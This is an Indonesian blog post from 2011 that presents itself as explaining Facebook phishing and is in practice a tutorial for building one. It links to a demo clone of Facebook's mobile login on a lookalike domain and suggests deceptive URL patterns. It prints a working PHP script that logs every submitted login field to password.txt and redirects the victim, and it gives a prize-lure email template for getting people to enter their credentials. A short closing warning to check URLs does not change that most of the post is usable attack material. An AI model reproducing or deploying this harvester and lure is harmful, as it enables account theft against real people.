Minggu, 18 Desember 2011

Hack Facebook Phishing


Facebook Phising - Apa itu phising? Apakah phising sangat berbahaya? Bagaimana cara hacker menggunakan phising? Bagaimana Cara membuat Phising?

Oke, saya mulai dari Apa itu Phising?
Phising adalah suatu tindakan mencuri data yang sensitif, seperti data email, password, bahkan data-data kartu kredit dengan memakai web yang nyaris mirip dengan web aslinya!
Sebagai demo,saya telah membuat contoh web phising facebook(mobile site)!
Langsung ke TKP gan! diansunday-pesbuk.com.nu
Mengenal Tehnik Phising, Hack Data Facebook Dengan Cara Sederhana
Web tersebut sangat mirip dengan aslinya kan?
Biasanya hacker sangat pintar memilih URL yang agak mirip, supaya korban tidak mencurigai link tersebut! Contoh:
facebook.com.nu/login , id-facebook.com.nu/home.php dan masih banyak contoh lainnya!
Sengaja saya pakai alamat diansunday-pesbuk supaya tidak ada yang tertipu! Web phising yang telah saya buat memakai Source Code Facebook mobile! Akan tetapi didalam Form loginnya telah saya edit ke dalam file saya yang lain, yaitu file /cuma-contoh-diansunday-saja.php!
Mengenal Tehnik Phising, Hack Data Facebook Dengan Cara Sederhana

Sedangkan Form Facebook yang asli seperti ini!yang berbeda hanya aksi terhadap file yang mana!
Mengenal Tehnik Phising, Hack Data Facebook Dengan Cara Sederhana

File /cuma-contoh-diansunday-saja.php bertugas untuk mencatat data login yang telah disubmit dalam form phising, data tersebut disimpan di password.txt!
<?php
header ('Location: http://diansunday.blogspot.com ');
$handle = fopen("password.txt", "a");
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "===============\r\n");
fclose($handle);
exit;
?>

Cara pertama yang paling banyak dilakukan oleh hacker untuk menjebak korban adalah mengirim link lewat email dan menawarkan hadiah-hadiah yang cukup menggiurkan! Dia akan sedikit memaksa Anda melakukan login akun facebook di web jebakan tadi yang telah dipasangi Fake Login (Login Tipuan)!
Contoh email dari saya untuk mengajak korban ke web phising yang telah saya buat!!

Selamat!!!
Akun Pesbuk Anda terpilih menjadi Pemenang dalam program Nama Pesbuk Ter-ALAY Sejagat Raya !!
Anda berhak mendapatkan hadiah menarik (menarik bus,truk dan kapal terbang ) + 1kupon menginap selama 3hari 3malam di kandang Harimau (saya yakin tidak akan ada mau dengan hadiah ini )!!!
Segera login ke akun pesbuk Anda untuk melakukan konfirmasi, klik http://diansunday-pesbuk.com.nu dan login dengan akun Pesbuk Anda!

Salam
Panitia Pemakaman!!

Wkwkwkwk Dalam mengirim email, memang harus sangat meyakinkan si korban!tapi itu semua memang tergantung tingkat Gombalisasi hacker masing-masing!
Ok, silahkan Anda coba Login di web saya yang td ( WARNING : JANGAN PAKAI DATA ASLI ) ! coba Anda masukan di kotak amal username dengan kata bebas, contoh : AkuOrangGanteng atau apapun terserah! Begitupun dengan kotak amal passwordnya dengan kata apa saja! Setelah menekan tombol Login dan Anda akan memasuki blog ini lagi!
Setelah itu semua , masuk ke file password.phpnya di link diansunday-pesbuk.com.nu/password.php maka apa yang Anda ketik di kotak login tadi akan muncul di file password.txt!


Ok,sekian dari saya! Hati-hati dengan Phising web seperti ini, Anda Termasuk Orang yang Sangat Ketinggalan Zaman Jika Akun Anda diHack dengan Tehnik ini! Kenali URL dengan secermat-cermatnya sebelum men-submit data-data penting Anda di web manapun!


UPDATE!
Demi kenyamanan pengunjung, saya samarkan file passwordnya supaya mudah memfilter input text, dikarenakan banyak yang memasukan kata-kata fulgar, jorok, kasar dan lain-lain !trims
Posted by: dian_sunday
diansunday Updated at: 03.02